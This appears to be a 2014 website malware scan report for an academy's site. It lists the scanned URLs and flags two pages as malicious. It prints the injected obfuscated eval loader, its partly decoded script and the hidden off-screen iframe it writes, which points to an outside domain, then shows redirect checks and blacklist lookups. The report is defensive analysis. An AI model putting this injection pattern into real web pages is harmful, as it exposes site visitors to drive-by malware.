Scanned pages/files
Request | Server response | Status |
http://calydonitacademy.com/ | 200 OK Content-Length: 22981 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\x5C\167\53'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\x5C\142','g'),k[c]);return p;}('\x49 \142=F\40\105(\51;\x62.Y(\142.12(\x29+\x32\x29;\x311\x281\60\x2E\117&\46f\56\x42\x2E\x54(\47\\S\134\x58\\j\134\x55\\\x65\134\150\')\75=\55\x31\x2 Decoded script: var exp=new Date();exp.setDate(exp.getDate()+2);if(navigator.cookieEnabled&&document.cookie.indexOf('\x5F_\165\155\x74\x64\x3D')==-1){document.write('\74\151\x66r\x61\x6D\x65\x20\x77\x69d\x74h\x3D\42'+Math.floor(Math.random()*100+100)+'\" \150\145\151\x67h\164=\42'+Math.floor(Math.random()*100+100)+'\42\40\146\162\x61\155\145\x62\157\x72\144\145r=\42\x30\42 \x73\164\171l\x65\x3D\42\x70o\163\151\164\151on\x3A\141\x62\163\x6Fl\x75\x74e\x3B\154e\x66t\72-'+Math.floor(Math.random()*100+2 <iframe width="163" height="174" frameborder="0" style="position:absolute;left:-243px;top:-267px" src="http://vppswwwedl.2waky.com/?go=1"></iframe> Antivirus reports:
| ||
http://calydonitacademy.com/lightbox/javascripts/top_up-min.js | 200 OK Content-Length: 48729 Content-Type: text/javascript | clean |
http://www.google.co.in/cse/brand?form=cse-search-box&lang=en | 200 OK Content-Length: 2508 Content-Type: text/javascript | clean |
http://calydonitacademy.com/index.htm | 200 OK Content-Length: 22981 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\x5C\167\53'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\x5C\142','g'),k[c]);return p;}('\x49 \142=F\40\105(\51;\x62.Y(\142.12(\x29+\x32\x29;\x311\x281\60\x2E\117&\46f\56\x42\x2E\x54(\47\\S\134\x58\\j\134\x55\\\x65\134\150\')\75=\55\x31\x2 Decoded script: var exp=new Date();exp.setDate(exp.getDate()+2);if(navigator.cookieEnabled&&document.cookie.indexOf('\x5F_\165\155\x74\x64\x3D')==-1){document.write('\74\151\x66r\x61\x6D\x65\x20\x77\x69d\x74h\x3D\42'+Math.floor(Math.random()*100+100)+'\" \150\145\151\x67h\164=\42'+Math.floor(Math.random()*100+100)+'\42\40\146\162\x61\155\145\x62\157\x72\144\145r=\42\x30\42 \x73\164\171l\x65\x3D\42\x70o\163\151\164\151on\x3A\141\x62\163\x6Fl\x75\x74e\x3B\154e\x66t\72-'+Math.floor(Math.random()*100+2 <iframe width="178" height="133" frameborder="0" style="position:absolute;left:-258px;top:-247px" src="http://vppswwwedl.2waky.com/?go=1"></iframe> Antivirus reports:
| ||
http://calydonitacademy.com/AboutUs.htm | 200 OK Content-Length: 13869 Content-Type: text/html | clean |
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 21950 Content-Type: text/javascript | clean |
http://calydonitacademy.com/Certification.htm | 200 OK Content-Length: 17353 Content-Type: text/html | clean |
http://calydonitacademy.com/Training.htm | 200 OK Content-Length: 54446 Content-Type: text/html | clean |
http://calydonitacademy.com/Facilities.htm | 200 OK Content-Length: 18759 Content-Type: text/html | clean |
http://calydonitacademy.com/ http://www.calydonitacademy.com/registration.htm | 404 Not Found Content-Length: 2445 Content-Type: text/html | clean |
http://cdn.dsultra.com/js/registrar.js | 200 OK Content-Length: 1652 Content-Type: application/x-javascript | clean |
http://calydonitacademy.com/test404page.js | 404 Not Found Content-Length: 2445 Content-Type: text/html | clean |
http://calydonitacademy.com/Careers.htm | 200 OK Content-Length: 21241 Content-Type: text/html | clean |
http://calydonitacademy.com/Contact.htm | 200 OK Content-Length: 16201 Content-Type: text/html | clean |
http://calydonitacademy.com/thumbnailviewer.js | 200 OK Content-Length: 7633 Content-Type: text/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: calydonitacademy.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 16 Apr 2014 03:05:14 GMT
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
Content-Length: 22981
Content-Type: text/html
Last-Modified: Tue, 01 Apr 2014 08:52:17 GMT
...22981 bytes of data.
GET / HTTP/1.1
Host: calydonitacademy.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 16 Apr 2014 03:05:14 GMT
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
Content-Length: 22981
Content-Type: text/html
Last-Modified: Tue, 01 Apr 2014 08:52:17 GMT
...22981 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: calydonitacademy.com
Referer: http://www.google.com/search?q=calydonitacademy.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: calydonitacademy.com
Referer: http://www.google.com/search?q=calydonitacademy.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=calydonitacademy.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://calydonitacademy.com/
Result: calydonitacademy.com is not infected or malware details are not published yet.
Result: calydonitacademy.com is not infected or malware details are not published yet.